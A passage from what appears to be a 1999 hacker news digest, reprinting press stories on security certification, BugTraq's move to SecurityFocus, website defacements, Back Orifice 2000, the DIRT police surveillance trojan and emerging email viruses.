'life protecting data'. The standard is typically utilized for devices
which protect tokens or encrypt data such as crypto boxes.
While this system may or may not be successful in real life, it
certainly deserves closer examination in that it represents what may
be the closest thing that the U.S. Government has to UL for computer
security products. Under the FIPS 140-1 Testing and Validation model,
vendors select an accredited FIPS 140-1 testing lab, submit their
'module' for testing and pay the testing fee. The lab then tests the
product for conformance to FIPS 140-1 and passes a report on the
'module' to NIST/CSE for validation. Throughout this process, the lab
may submit questions for guidance and clarification to NIST/CSE. If
the report is favorable, a validation certificate is issued by
NIST/CSE for the 'module'. The certificate is presented to the vendor
through the lab and the 'module' is added to the published list of
Validated FIPS 140-1 Modules.
The problem may stem from the difference between UL's roots and those
of ICSA and CISSP. It certainly manifested itself in the fact that the
UL is the only one providing non-biased product inspections as well as
accountability for the quality of the installations out there in the
field. Requirements for the use of 'listed' intrusion detection
systems, encryption mechanisms, and companies could on its own make an
impact if that listing actually meant something. The use of strict
procedures and specific levels of physical security could be required
as in the GSA model and this too could help the private sector. This
has not been the tact taken to date, however.
The second problem is that manufacturers of physical security devices
are pressured by customers to have a UL listing. This is because
customers are pressured by insurance underwriters to use products that
meet UL specifications. In Cyberspace, businesses currently feel that
the embarrassment and loss of public trust are more costly than the
actual damage caused by hackers. Citibank has become the most
well-known example of what happens when computer intrusions are made
public knowledge. By taking commendable actions and not covering up
the intrusion, Citibank is now known as the bank that got hacked
instead of the bank that handled the situation appropriately. Since
silence seems to be the best policy, cyber merchants choose to 'eat'
their losses rather than risk the negative publicity. Until these
losses become intolerable and insurance is necessary, there may be no
motivation to drive the certification, approval or listing of products
by UL or any similar organization.
It took UL about 30 years from being subsidized by the insurance
agencies to being self-supporting off fees paid by manufacturers for
testing. Merrill was the first full-time employee as a result of this
change. Insurance underwriters and Consumer Product Safety Commission
were instrumental in gaining public acceptance of UL work. It was the
public's safety that was of concern and liability drove companies to
insure. Insurance underwriters found they were then saddled with the
problem and addressed it effectively with the UL. Perhaps at some
point the collection and storage of information on the public will
carry some sort of liability with it.
A Call for Action
Without a call for action, I would simply be a whiner. At this point,
you the reader can assist with very little effort. Whether you are a
vendor, insurance company, end user, or hacker, let me know your
thoughts on the state of the industry, the state of the UL and/or this
article's conclusions. As a hacker, is the relationship between the
hot-shot safe crackers and the UL an attractive one you would be
interested in? Is the UL listing process for installations sufficient?
Will it encounter problems unforeseen by this article? As an insurer,
am I missing part of the picture; are companies actually insuring
their computer systems and data to mitigate loss or liability? As a
manufacturer do you foresee problems with the UL model being imposed
on computer security products? As an end user do you feel that
computer security is important? Do you feel that the current system
actually is sufficient? Have you been wanting something better or do
you feel that you are being slighted by my insinuation that you do not
fully understand the products you purchase? Any and all feedback on
this article would be appreciated no matter where it comes from
(although manufacturer comments will be taken with a grain of salt).
Forward those comments to tan@l0pht.com. If there is enough feedback,
I may write a follow up article on this topic. I am considering going
into detail on each rating system UL, German, Scandinavian, GSA and
FIPS 140-1, highlighting overlaps with the computer security
discepline.
Thanks to the UL for providing documentation on the history of the UL
and directing me to Peter Tallman of the Melville, N.Y. office. Thanks
to Peter Tallman for clarifying some of the issues surrounding the
listing of safes and alarm systems and directing me to Beverly
Borowski whom I hope can assist me in my future research. Also of use
to date was FED-STD-809, the federal standard for neutralization and
repair of GSA approved containers as well as a yearly publication by
the Dutch Safe Rating Committee called 'Recommendations for Insuring
Money in Safes and Strongrooms'. GSA's web site (www.gsa.gov) provides
a searchable index of federal standards including FED-STD-809. The
Dutch Safe Rating Committee is at Stichting Kwaliteitsbeoordeling
Brandkasten (SKB), P.O. Box 85764, 2508 CL The Hague, The Netherlands
- Tel. 070-3912008. Additional thanks to the researchers at the L0pht
for their assistance, particularly to Brian Oblivion for providing
extensive documentation on FIPS 140-1.
@HWA
20.0 BugTraq Moves To SecurityFocus
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 29th
From HNN http://www.hackernews.com/
contributed by Aleph One
BUGTRAQ, the premier security mailing list, will officially
be moving from its current home at Netspace.org to
Securityfocus.com on July 5th. Security Focus will be a
major security web site featuring complete BugTraq
archives, Daily News, vulnerability information and lots
lots more.
Security-Focus
http://www.securityfocus.com
InfoWorld
http://www.infoworld.com/articles/op/xml/990628opswatch.xml
Security Watch | Stuart McClure and Joel Scambray
Portals open on security landscape
AS SECURITY GROWS into a major concern for IT shops, a number of online security portals have
sprouted up. These offer nearly everything you'll need to manage security at your site. A number of
Web pages have begun in the last couple of months, but the most impressive ones are just now
opening. We have frequented many in our security travels, and we think that Securityfocus.com, a site
debuting the week of June 26, looks the most promising for providing comprehensive and one-stop
security information.
Since we started Security Watch more than a year ago, we've seen our column's name borrowed by a
number of people. Now you'll have to add Securitywatch.com, in Belgium, to that list
(www.securitywatch.com). According to its semiveiled Web page, the site will debut July 5 and will
offer the usual security news, products, trends, jobs, literature, and links. But, like Securityfocus.com,
Securitywatch.com also promises a vulnerability database. The depth and breadth of its vulnerability
archive remains to be seen, however, as we have yet to receive an offer to preview this site (surprise,
surprise).
One of the earliest collections of security resources on the Internet came from SecuriTeam.com. The
site has been available for more than a few months and offers security news, reviews, exploits, and
tools. Although its content isn't as complete or as well organized as that of some others, it offers a
decent set of security resources and timely vulnerabilities that we have frequented and highly
recommend checking out.
SecurityPortal.com has been around for a number of months and offers a fairly good set of security
content including a weekly column, security news, discussion forums, services, a research center
(links and resources), and even an online store. It also offers a centralized location to search for
computer security jobs at all the major career sites, including Career Builder, Career Mosaic, and
Monster Board.
SecureZone.com is a relative newcomer and at first glance looks much like a general search engine.
The site offers a variety of security information and resources, and even allows you to add your URL
to its site. But unlike Securityfocus.com and Securitywatch.com, SecureZone does not offer its own
vulnerability database. Also, we experienced delays when using the site; be prepared for a wait. The
site is run by En Garde Systems (www.engarde.com), the product vendor that offers the nifty security
software T-Sight and IP-Watcher.
The heavy hitter
Combine the Bugtraq archive (www.geek-girl.com), Packet Storm's exploits and tools
(www.genocide2600.com/~tattooman), and Hacker News Network's timely news
(www.hackernews.com), and you'll barely scratch the surface of the content provided on
Securityfocus.com (www.securityfocus.com). The new Web site should be up this week and will offer
one of the best collections of security resources available on the Internet. We got a sneak peak at this
site and were duly impressed.
For starters, Securityfocus. com offers one of the most up-to-date security news sections available.
Also included on the site are security tools, products, books, an events calendar, and forums. But
unlike many of its competitors, Securityfocus.com offers a robust -- and free -- vulnerability
database. The site also lets you query for only the technology that's important to you. For example, if
you're primarily a Solaris 2.51 shop running Netscape Enterprise Server, you can query only the
relevant vulnerabilities. You can personalize the entire Web site by selecting the type of news,
calendar events, products, tools, and vulnerabilities you care about. Securityfocus.com will also
provide a free applet for your desktop that will warn you as soon as a relevant vulnerability is released.
Securityfocus.com is the brainchild of the original Secure Networks group. The team created the
Ballista security scanner product (now named CyberCop Scanner from Network Associates) and has
discovered numerous product vulnerabilities on its own. Aleph One, the moderator and caretaker of
the Bugtraq mailing list (one of the most widely subscribed computer lists in the world), has added his
muscle to the site in offering the entire Bugtraq archive as part of the vulnerability database. Also, the
entire Bugtraq mailing list will be moved to Securityfocus.com so archives can be searched.
After witnessing the birth of so many security portals on the Internet during the past year, we can't
help but wonder what's next for the security community. Personally, we wouldn't mind seeing the
paging service that warns administrators about new vulnerabilities the minute they become public, or
maybe the downloading of daily security news to your Pilot with AvantGo (www.avantgo.com). In any
case, the future is definitely bright for security professionals. Check out these portals and let us know
which ones you'll be visiting at security_watch@infoworld.com.
Stuart McClure is a senior manager and Joel Scambray is a manager at Ernst & Young's
eSecurity Solutions group. They have managed information security in academic, corporate, and
government environment
@HWA
21.0 MS Gives Out Pirate Dough
~~~~~~~~~~~~~~~~~~~~~~~~~~
June 29th
From HNN http://www.hackernews.com/
contributed by Code Kid
Microsoft is planning to give away up to $25 million over
the next five years, or half of it proceeds from its
antipiracy efforts, toward technology access and
education projects around the world. MS estimates that
it will receive aprox $10 million in civil and criminal
antipiracy proceeds annually over the next five years.
Wired
http://www.wired.com/news/news/business/story/20469.html
Microsoft Shares Piracy Loot
Reuters
3:00 a.m. 29.Jun.99.PDT
Microsoft plans to give away half its
proceeds from efforts to crack down on
software piracy, or at least US$25 million
over the next five years, a company
executive said.
Brad Smith, general counsel for worldwide
sales and support for Microsoft, said the
software company is seeing a growing
stream of revenue from settlements and
criminal penalties assessed against
counterfeiters.
See also: Germany Jails Software Pirate
"Obviously we rely heavily on law
enforcement for support," Smith said.
"Given that support from the public
sector, we felt it was proper to share
some of these recoveries with the
communities that, like the company, are
suffering from piracy."
He said that Microsoft, which had $14.5
billion in revenues last year, expects at
least $10 million in civil and criminal
antipiracy proceeds annually over the
next five years, although he said the
company is spending more than that on
efforts to enforce software laws.
Smith said piracy is not necessarily
growing, but authorities are increasing
their enforcement in part because many
large counterfeiting operations are
connected to organized crime.
"The reason we go after it so much is
because we're cutting off a major source
of funding for criminal syndicates," said
Marc Frank, a Westminster, California,
police sergeant who heads the
multi-agency Asian Organized Crime Task
Force.
"It's not because we're the Microsoft
police," he said. "It's because we're
hitting the organized criminal syndicate
where it hurts them -- in the
pocketbook."
The task force's efforts culminated this
year with a raid on a factory in the
southern California city where officers
found $2.5 million in manufacturing
equipment and more than $40 million
worth of counterfeit Microsoft Windows,
Office, and other programs. A total of 11
people have been arrested or indicted in
connection with the raid, Frank said.
Microsoft's donations will go toward
technology access and education
projects around the world, Smith said.
Copyright� 1999 Reuters Limited.
@HWA
22.0 Biometrics comes to Home Shopping
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 29th
From HNN http://www.hackernews.com/
contributed by RickDogg
The Home Shopping Network will introduce biometric
security to a large variety of consumers when it
launches its voice-print technology next month. This
new technology will enable HSN to automatically identify
customers by their voice. This will allow repeat
customers to order products faster and will allow HSN to
create a very accurate customer database.
Wired
http://www.wired.com/news/news/technology/story/20460.html
Giving Voice to Net Security
by Leander Kahney
3:00 a.m. 29.Jun.99.PDT
The Home Shopping Network next month
will be able to automatically identify
customers on the phone by their voices.
In the first large-scale deployment of its
kind, HSN's speech-print service will allow
frequent shoppers to dispense with
passwords and personal identification
numbers, the company said.
See also: Biometric Banking Bides Time
Voice recognition is just the first step:
HSN said it hopes to completely automate
the ordering process by the end of the
year.
Based on technology from Nuance
Communications, the voiceprint system
will ask callers for their phone numbers.
Callers will then be passed on to human
order-takers to complete the purchase.
"[Voice-recognition systems] are a lot
more convenient for the customer and
can save the company a lot of money,"
said Steve Ehrlich, Nuance's vice
president of marketing.
Automated phone-ordering systems can
cost 90 percent less than conventional,
human-operated systems, according to
Ehrlich, who said Charles Schwab will roll
out a similar system later this year.
He said the technology handles a number
of languages and copes well with regional
accents and things like bad phone lines
and stuffy noses.
In addition to convenience, the
technology will help HSN build a detailed
database of its customers, said Bill
Meisel, editor and publisher of the Speech
Recognition Update, a monthly
newsletter.
Currently, a household is issued a single
verification number by HSN.
The voiceprint technology will allow the
company to identify and collect data on
individual members in a household, Meisel
said.
"These are the kind of subtle advantages
that make fraud prevention almost a
secondary consideration," he said.
However, Meisel said the voiceprint
system will be more secure than using a
verification number.
To crack the system would require a
wiretap to obtain an accurate recording
of someone's voice, Meisel said. It should
not be possible to simply use a tape
recorder.
"The process of taping a voice changes
its acoustic characteristics," he said. "It
wouldn't work with a tape recorder ...
practically speaking, it's very difficult [to
crack the system]."
Meisel said similar voice-recognition
systems are in use in prisons, where
calling rights are a form of prison
commerce.
@HWA
23.0 Palm VII Revealed
~~~~~~~~~~~~~~~~~
June 29th
From HNN http://www.hackernews.com/
contributed by Kingpin
Too poor to buy a Palm VII? Don't want to risk your new
toy? Well one brave soul has taken apart his Palm VII,
taken pictures, and posted them to the web. A nice
treat for you hardware guys.
The Gadgeteer
http://www.the-gadgeteer.com/palmvii-guts.html
@HWA
24.0 Who Is HNN?
~~~~~~~~~~~
June 29th
From HNN http://www.hackernews.com/
contributed by Space Rogue
A lot of people have asked just who is it that runs HNN
and keeps the place together. We have created a page
to answer just that question. The page even has
pictures and everything.
Who Is HNN?
http://www.hackernews.com/misc/whorwe.html
HNN will be packing up shop and heading for Las Vegas
sometime around Wednesday next week. We will do
what we can to update the site remotely but the
updates may be periodic at best. Besides who is going
to be around to read HNN if everyone is at Defcon?
@HWA
25.0 AntiOnline on the trail of f0rpaxe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From www.antionline.com
AntiOnline Tracks F0rpaxe
Tuesday, June 29, 1999 at 14:00:15
by John Vranesevich - Founder of AntiOnline
AntiOnline investigations into the recent wave of attacks being
done by a group known as 'F0rpaxe' has led to the discovery of
the true-life-identity of the group's leader, aka m1crochip.
F0rpaxe is known to have broken into over 130 servers in the
past two months, belonging to dozens of different organizations,
including:
NASA Goddard Space Flight Center
US Navy
US Coast Guard
US Department of Agriculture
US Department of the Interior
University of Wisconsin
Harvard University
University of Colorado
Georgetown University
University of Michigan
UC Davis
F0rpaxe officially 'Declared War' against the US government
after the FBI raided several malicious hackers, including
individuals known to be members of the 'gH' hacking group,
which is believed to be responsible for attacks against the White
House's Website. F0rpaxe released a statement earlier this
month which read in part:
We think that FBI should explain what a fuck they are doing.
For the moment we wont destroy the servers we hack but if it
is necessary we can burn alot of servers.
M1crochip, along with several other F0rpaxe members, have
been featured in several publications, including MSNBC and
Wired News.
F0rpaxe's latest attack took place yesterday, against servers at
UCLA.
AntiOnline was able to gain the name and phone number of
m1crochip, who lives in the city of Perafita, Portugal, shortly
after a request for information came in.
Note: AntiOnline will not release information on this individual to the general public.
@HWA
26.0 Critical NOAA Web Site Attacked
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 30th
From HNN http://www.hackernews.com/
contributed by Mortel
The Storm Prediction Center, an arm of the National
Oceanic and Atmospheric Agency (NOAA) was defaced
yesterday. While the site was primarily used to
distribute severe weather warnings, that information
was available from other sources such as the National
Weather Service. Unfortunately NOAA chose to run
critical services such as email on the same machine so
when they took down the server to correct the
defacement their email was also off line creating severe
disruptions in office work flow.
HNN Cracked Pages Archive
http://www.hackernews.com/archive/crackarch.html
Fox News
http://www.foxnews.com/js_index.sml?content=/scitech/wires2/0629/t_rt_0629_40.sml
MSNBC
http://www.msnbc.com/news/284765.asp
Computer World
http://www.computerworld.com/home/news.nsf/all/9906292noaahac
Andover News
http://www.andovernews.com/cgi-bin/news_story.pl?3570/topstories
Correction: 1615EST
We have been informed that the email server was not
on the same machine as the web server but was taken
offline as a precautionary measure until the extent of
the attack could be determined.
Fox;
Hackers Hit Storm Prediction Web Site
8:16 p.m. ET (017 GMT) June 29, 1999
NORMAN, Okla. � Computer hackers vandalized the Web page of the top U.S.
weather agency's storm prediction center Tuesday in the latest of a rash of attacks
on government Internet sites, officials said.
The attack blocked the Internet weather warnings of the Storm Prediction Center,
an arm of the National Oceanic and Atmospheric Agency (NOAA), at a time of
year when powerful thunderstorms and tornadoes can break out across the Plains
states.
"If there were severe weather already happening at that time of morning, it could
have been a problem for a lot of people,'' Dr Joseph Schaeffer, director of the
Storm Prediction Center, told Reuters.
Hackers calling themselves the "Keebler Elves'' deleted the Storm Prediction
Center homepage (www.spc.noaa.gov) and replaced it with their own page
declaring "Learn to fear the elite''.
Schaeffer said the same storm forecasts were available elsewhere, including from
the National Weather Service.
But he said the blockage was an inconvenience to emergency management
officials, who are used to quick and easy Internet access to the center's updated
weather maps and other data.
The attack was discovered at 3:00 a.m. EDT (0700 GMT) by someone trying to
find weather data and reported quickly, so storm center technical staffers shut
down the Web page.
Repairing the damage and tracing and recording the hacker's steps for potential
future criminal prosecution would keep the Web site down until late Tuesday,
officials said.
The damage also shut down the Web page of NOAA's Severe Storm Laboratory
(www.ssl.noaa.gov), which is next door to the storm prediction center in Norman,
Oklahoma. The Internet pages for both centers are run from the same computer,
which was invaded by the hackers.
The U.S. Army earlier Tuesday said it had launched a criminal investigation into an
electronic break-in of its main Internet site, but stressed that hackers did not breach
military security or operations.
A hacker group also broke into four U.S. Department of Agriculture Web sites
over the weekend, the USDA said.
Military and other government officials have voiced major concern over repeated
break-ins in the past year by electronic wizards anxious to simply show their
hacking ability or to actually steal secrets.
In March, a Pentagon-sponsored study ordered by Congress in 1995 concluded that
military computer and communications systems were increasingly vulnerable to
attack by hackers and high-tech enemies.
-=-
Computer World;
Weather Web site hit by intruders
By Kathleen Ohlson
The National Oceanic and Atmospheric Administration's
(NOAA) Storm Prediction Center became the latest Web
target of hackers when one or more intruders broke into the
site.
Both the site and e-mail for the Storm Prediction Center,
based in Norman, Okla., were taken down as soon as the
infiltration was detected, said Tim Tomastik, the NOAA's
deputy director of public affairs in Washington. Tomastik
said the attack on the federal weather service forced its
clients and customers to go to other sites for weather data.
"It's weather data," he said. "There's no national security
involved. I have no idea why they would go after it."
Officials are still trying to determine what, if any, damage
was done to the site by the intrusion. So far, they know that
some "real minor goofing with the text occurred," but
nothing major, Tomastik said.
Yesterday, the U.S. Army Web site was breached (see
story) and the home page defaced.
Tomastik said the NOAA is evaluating its system and
expects federal authorities to look into what happened. The
site is expected to be back up later today.
@HWA
27.0 Back Orifice 2000 is on its Way
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 30th
From HNN http://www.hackernews.com/
contributed by RickDogg
Set to be released on July 10th at Defcon, Back Orifice
2000 is already making news. The new version of Back
Orifice will run on NT, be much harder to detect and
have a very robust plugin architecture.
Wired
http://www.wired.com/news/news/technology/story/20493.html
Back Orifice 2000
http://www.bo2k.com
Wired;
Coming Soon: Back Orifice 2000
by Niall McKay
3:00 a.m. 30.Jun.99.PDT
An underground computer security group is poised to release a new version of a
notorious software program that could allow crackers to watch and listen in on
Windows-based PC users.
The Cult of the Dead Cow said it will release Back Orifice 2000 on 9 July -- at
the annual Def Con convention in Las Vegas.
"This will demonstrate that Microsoft's operating systems are completely
insecure and a bad choice for consumers and businesses who demand privacy,"
said Oxblood Ruffian, a former United Nations consultant and current Cult of
the Dead Cow spokesman.
See also: Back Orifice a Pain in the ...?
http://redirect.wired.com/redir/10025/http://www.wired.com/news/news/technology/story/14092.html
Def Con is perhaps the most unusual gathering in the computer security field.
Hackers, crackers, and self-proclaimed security experts will mingle with media,
security professionals, federal law enforcement officers, and "script kiddies"
who deface Web pages with prefab cracking code.
Security groups of all stripes use the occasion to release software and show
off gadgets. But Back Orifice 2000 is perhaps the most anticipated item.
Unlike previous versions of the software, Back Orifice 2000 will run on Windows NT
and feature strong encryption and a modular architecture that the group said
will allow hackers and other security groups to write plug-ins.
The program will be released as open source to encourage further development
by the security community.
Back Orifice, released at last year's Def Con, may allow malicious users to monitor
and tamper with computers without the permission or knowledge of their owners.
The program is classified as a Trojan Horse because crackers need to dupe the
user into installing an application on their hard disk. Despite this, Oxblood Ruffian
said that the program is currently installed on up to a half-million PCs
worldwide.
Though that number could not be independently verified, an Australian
computer security group last November said that 1,400 Australian Internet
accounts have been compromised by Back Orifice.
Back Orifice 2000 also promises to be a great deal more difficult to detect than
its predecessor because it enables users to configure its port setting. Previously,
intrusion detection and antivirus programs could detect Back Orifice because it used
a default port setting of 3113. (Er that should read 31337 -Ed)
A Microsoft Windows NT Server security manager said the company is closely
monitoring Back Orifice development and is working with antivirus and intrusion
detection software vendors to provide customers with utilities to combat the
software.
"Trojan Horses are not technological issues but a social engineering problem
because they rely on the ability of the cracker to trick the user into running an
application," said Scott Culp.
"It's just a fact of computer science that if you run a piece of code on your
machine you run the risk making your system vulnerable."
The solution, according to Culp, is to ensure that users do not install any
software from untrusted sources and regularly update antivirus and intrusion
detection programs.
Also at the show, independent security consulting firm L0pht Heavy Industries will
release Anti-Sniffer, a network monitoring tool, and will announce B00te Call, a
PalmPilot War Dialer. Such programs will automatically dial telephone numbers in
sequence, looking for modems.
Zero-Knowledge Systems is also expected to provide further details about Freedom,
a network of servers promising total online anonymity.
Def Con will also feature some of its legendary sideshow attractions, such as
the Spot the Fed contest. In this game, conference attendees are invited to point
out suspicious attendees who may be working for federal law enforcement
agencies. Winners will be awarded an "I spotted the Fed" T-shirt.
Other diversions include a fancy dress ball, Hacker Jeopardy, and the Hacker
Death Match, a game that enables hackers to take their flame mails out of
cyberspace and into reality by dressing up in giant inflatable Sumo suits to do
battle.
Well-heeled attendees are invited to a US$100 outing to Cirque du Soleil.
Meanwhile, the conference will include sessions on how to detect wiretaps; the
art and science of enemy profiling; hacking ethics, morality, and patriotism;
cyber-forensic analysis; and a talk on the practice of hiring hackers as security
consultants.
@HWA
28.0 Support for Web Security Spec Announced
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 30th
From HNN http://www.hackernews.com/
contributed by RickDogg
Microsoft and HP have announced their support for the
HTTP/1.1 Message Digest Authentication specification.
This new specification published by the Internet
Engineering Task Force last month proposes the use of
MD5 instead of SSL for password traffic.
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,408287,00.html
@HWA
29.0 Pentagon Investigates Computer Security Breech
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 30th
From HNN http://www.hackernews.com/
contributed by RickDogg
An employee of the Defense Threat Reduction Agency is
under investigation by the Air Force Office of Special
Investigations for allegedly seeking unauthorized access
to the computer system of a coworker. Evidently the
employee requested access to a senior official's
computer while the official was away. The request was
denied and no access was gained.
San Jose Mercury News
http://www.sjmercury.com/breaking/docs/020735.htm
Posted at 9:22 a.m. PDT Tuesday, June 29, 1999
Defense employee faces probe
over computer incident
WASHINGTON (AP) -- The Pentagon said today it is investigating an
attempted computer security breach last week at a defense agency
responsible for reviewing sensitive technology exports.
An unidentified employee of the Defense Threat Reduction Agency is
under investigation for allegedly seeking unauthorized access to the
computer system of a coworker, agency spokesman Clem Gaines said.
Gaines said the employee under investigation by the Air Force Office
of Special Investigations had requested access to the government
computer used by Peter Leitner, a senior advisor to the defense agency
on matters involving exports of sensitive technologies. Gaines declined
to identify the individual.
The individual's request for use of Leitner's computer was denied and
there was no security breach, Gaines said.
The unauthorized request for access to Leitner's computer was made
June 24, while Leitner was on Capitol Hill testifying before the House
Committee on Government Reform, Gaines said.
Leitner has rankled some in the Pentagon by charging that senior
defense officials have glossed over concerns in the lower ranks that
U.S. businesses were allowed to sell China and other countries
technology with military applications.
Gaines, the agency spokesman, said he could not discuss any details of
the computer security investigation, which was requested Monday by
the agency's director, Jay Davis.
Pending the outcome of the investigation, the individual has been
temporarily assigned to other duties, which Gaines did not specify.
@HWA
30.0 What will the Next Generation of Viruses Bring?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 30th
From HNN http://www.hackernews.com/
contributed by Deepquest
Melissa and WormExplorer were devastating to business
and governments world wide. As viruses get more
sophisticated and virus writers get more creative what
sort of viruses can the world expect to see in the next
six months or a year?
BBC
http://news.bbc.co.uk/hi/english/sci/tech/newsid_381000/381054.stm
Sci/Tech
New virus spills your beans
Virus threatens document security
A new strain of computer virus could distribute your
highly confidential documents all over the Internet.
Anti-virus developers are warning that they cannot
develop an antidote until the virus appears. Far from
destroying vital files, the virus will make sure everyone
can see them.
The new virus is expected to be a variant of either
Melissa or the Explore.Zip worm, both of which have
cost businesses millions in recent weeks.
Both Melissa and the Explore.Zip worm rely on people
opening email attachments. Once into the computer the
virus sends a message to everyone in the victim's in-box
and then destroys every file written in Microsoft Word,
Excel or Powerpoint, among others.
New virus on the block
One variant has already appeared. PrettyPark replicates
itself by sending copies to everyone in the victim's
address book.
It waits silently until the victim is on the Internet, then
sends lists of the victim's user names, password files
and address lists to Internet Relay Chat channels.
Anti-virus developers are expecting the next step to be a
virus which roots around in your files and then posts your
documents across the Internet.
"The virus wouldn't be able to tell which of your
documents are secret. It might just post your shopping
list, or it could be a highly sensitive company document.
"What's more, it would appear as if you sent it," says
Graham Cluley of Sophos Anti-Virus.
Several anti-virus makers already have an answer to
PrettyPark. But they cannot build a defence against
future variants until they encounter them.
Java and ActiveX - next infection target
It is predicted that the next generation of viral infections
will hit small Webpage programmes called applets,
written in Java and ActiveX.
A recent survey revealed that more than half of
medium-sized organisations using an intranet had no
security policy in place to respond to the threat of
attacks on Java applets.
Recent estimates indicate that Melissa, Explore.Zip and
other malicious attacks have cost US business $7.6bn
this year alone. The viruses cannot infect Macintosh or
Unix systems.
@HWA
31.0 DIRT still Around, Used by LAw Enforcement
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 30th
From HNN http://www.hackernews.com/
contributed by wannabe
We have all heard of BO (Back Orifice) or NetBus but
what about DIRT? DIRT stands for Data Interception by
Remote Transmission and is a commercial software
package only available to law enforcement officials.
DIRT, like BO and NetBus, allows remote control of a PC
with or without the user's knowledge. Unfortunately this
article makes no mention of whether it is necessary for
law enforcement to get a search warrant before they
use such a tool.
PC World
http://www.pcworld.com/pcwtoday/article/0,1510,11614,00.html
Correction 1615EST
Evidently the above story does mention that a search
warrant is needed before law enforcement can use this
tool. Unfortunately we missed that information. The
story does mention that Frank Jones think that the Cult
of the Dead Cow stole the idea for Back Orifice after
seeing a DIRT demo. We have recieved staunch denials
of this accusation from several members of cDc.
PC World;
Getting DIRT on the Bad
Guys
Here's the ultimate weapon in the war against
cyber crime.
by Tom Spring, PC World
June 29, 1999, 12:23 p.m. PT
To former detective Frank Jones, "secure network" is
an oxymoron. The word "delete" isn't in his vocabulary.
Password-protect your computer and you'll make his
day.
And if you really get on Jones' bad side, he'll take
complete control of your PC--and your first clue will be
when you open your door and the boys in overcoats
start flashing badges at you.
If you're among the anonymous thousands of cyber bad
guys who inhabit the Internet's underbelly, Jones is
your worst nightmare.
The retired New York City detective works on the law
enforcement sidelines building software tools to help
the government and police crack down on online
criminals.
And his latest tool is considered the ultimate weapon.
Digging up DIRT
Jones wrote the widely used, but little-known software
program called DIRT. The program works like a
telephone wiretap for computers, giving its users the
ability to monitor and intercept data from any Windows
PC in the world.
DIRT stands for Data Interception by Remote
Transmission and was originally created by Jones as a
tool to help snare online child pornographers. But in the
short time it has been available only to government and
law enforcement agencies, DIRT is now used to battle
hacker groups like Cult of the Dead Cow and to trap
terrorists, drug dealers, money launderers, and spies.
"What we do is give law enforcement an additional line
of defense," says Jones, the president of Codex Data
Systems.
The DIRTy Details
The client side version of the DIRT program is less than
20KB in size and is typically installed on a target PC
using a Trojan horse program (a set of instructions
hidden inside a legitimate program). The DIRT program
is usually sneaked inside an e-mail attachment, a
macro, or a workable program that a targeted user is
enticed to download.
Once inside a target Windows 95/98/NT computer, it
gives law enforcement complete control of the system
without the user's knowledge.
It starts off by secretly recording every keystroke the
user makes. The next time the user goes online, DIRT
transmits the log for analysis. Jones says government
agencies have even managed to open encrypted files
by obtaining password locks.
During a recent program demonstration, Jones easily
uploaded and downloaded files to a DIRT-infected
computer connected to the Net by a dial-up modem.
Jones could upload and download files to the PC
without a hint of activity on the other end.
Arresting Developments
If you think this sounds like B-grade fiction, it isn't.
During a recent meeting of high-ranking federal and
state gumshoes, DIRT received glowing software
reviews. Many cited long lists of arrests thanks to
Codex.
One police detective said DIRT has become a powerful
tool in fighting crime online. It aids criminal
investigations and results in about one arrest each
month. Most of those arrested were suspected
pedophiles, he said.
The hardest part of using DIRT, say its users, is getting
owners of targeted computers to download the Trojan
horse programs. Typically law enforcement tries to
entice a targeted individual to download a program or a
compressed file that must be "un-zipped" which
contains the DIRT bug inside. Because the program is
not available to the public, DIRT is undetectable using
virus scanning software, Jones said.
"The only way to avoid DIRT is to ignore your e-mail,"
he says.
Fighting Fire With Fire
Jones says law enforcement desperately needs these
tools to turn the tide in its battle against online crime.
"Law enforcement is outgunned," he says.
In an age where hacking horror stories have become
front-page news, DIRT gives law enforcement an
effective tool to even the score and catch the bad guy.
On one recent occasion DIRT was used to track a
suspected drug dealer as he zigzagged across the
country from client to client selling methamphetamines.
His big mistake, police say, was keeping a client list
on his laptop and logging into the Net each night to
stay in touch with business associates and friends.
Using DIRT, police tracked his whereabouts each night
and took notes on who his associates were. The
alleged drug dealer was eventually arrested as he was
surfing the Net in a San Jose, California motel room.
A Form of Flattery?
Though DIRT is restricted to military, government, and
law enforcement agencies, the "Back Orifice" hacker
tool offers some similar tricks.
Jones maintains that its inventor, a member of the
hacking group Cult of the Dead Cow, attended Codex's
first public demonstration of DIRT more than a year ago
and slapped together an "imitation" of DIRT based on
what he saw.
"Close, but no cigar," Jones says.
But according to Mike Hudack, editor of
Aviary-mag.com, an online magazine for hackers,
there's more to Back Orifice than that. An updated
version called "Back Orifice 2000" is expected to hit
the Web in July.
Big Brotherware?
Hudack says the technological Cold War between
white-hat hackers and black-hat hackers is just
beginning--and law enforcement needs all the help it
can get.
But others view DIRT as a potential threat to privacy,
raising serious legal and ethical questions as a means
of gathering information.
To use DIRT law enforcement agencies must first
obtain a wiretap search warrant. But privacy groups
maintain that this type of electronic surveillance goes
far beyond wiretap warrants because DIRT allows
authorities to invisibly snoop inside a targeted PC's
entire hard drive --not just monitor electronic
communications.
"Throughout history law enforcement has had a long
track record of overstepping its bounds when it comes
to search warrants," says Shari Steele, director of legal
services for Electronic Freedom Foundation, the privacy
rights group.
Unless appropriate checks and balances are in place,
Steele says, DIRT can quickly go from being an
effective crime-fighting tool to a privacy activist's worst
nightmare.
The American Civil Liberties Union takes a harder
stance.
"Clandestine searches like these are the worst kind,"
says Barry Steinhardt, associate director of the ACLU.
"This is exactly the kind of search the Fourth
Amendment is designed to protect us from."
@HWA
32.0 Debit Cards Not Safe on the Internet
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 30th
From HNN http://www.hackernews.com/
contributed by mortel
Illustrating the problem of debit card use on the
Internet Don Garlock, a consultant for the Bedford
County Sheriff's Department in Bedford, VA describes his
search for the people who wiped out his bank account.
MSNBC
http://www.msnbc.com/news/283239.asp
The dark side of
online shopping
Trail of fraud leads from
Amazon.com to Thailand
